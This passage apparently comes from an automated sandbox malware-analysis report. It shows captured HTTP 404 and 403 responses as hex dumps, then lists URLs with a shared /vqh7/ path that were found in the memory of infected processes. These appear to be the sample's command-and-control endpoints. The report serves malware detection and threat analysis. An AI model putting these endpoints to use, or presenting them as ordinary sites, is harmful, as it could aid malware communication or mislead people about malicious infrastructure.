34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requ
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Feb 2023 11:45:33 GMTServer: Apache/2.4.54 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Feb 2023 11:45:36 GMTServer: Apache/2.4.54 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Feb 2023 11:45:38 GMTServer: Apache/2.4.54 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 10 Feb 2023 11:45:54 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 10 Feb 2023 11:45:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 10 Feb 2023 11:45:59 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Feb 2023 11:46:12 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Feb 2023 11:46:24 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
          Source: explorer.exe, 00000002.00000002.537406866.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003DBC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://treebarktees.com/vqh7/?u1ua=avntfzZWwL7S
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awc.icu
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awc.icu/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awc.icu/vqh7/o
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awc.icuReferer:
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dinggubd.net
          Source: explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dinggubd.net/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dinggubd.netReferer:
          Source: explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frogair.online
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frogair.online/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gachthe365.site
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gachthe365.site/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heroclassicrally.co.uk
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heroclassicrally.co.uk/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heroclassicrally.co.uk/vqh7/-
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heroclassicrally.co.ukReferer:
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.top
          Source: explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.top/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.top/vqh7/K6jN
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.topReferer:
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jewelryimpact.com
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jewelryimpact.com/vqh7/
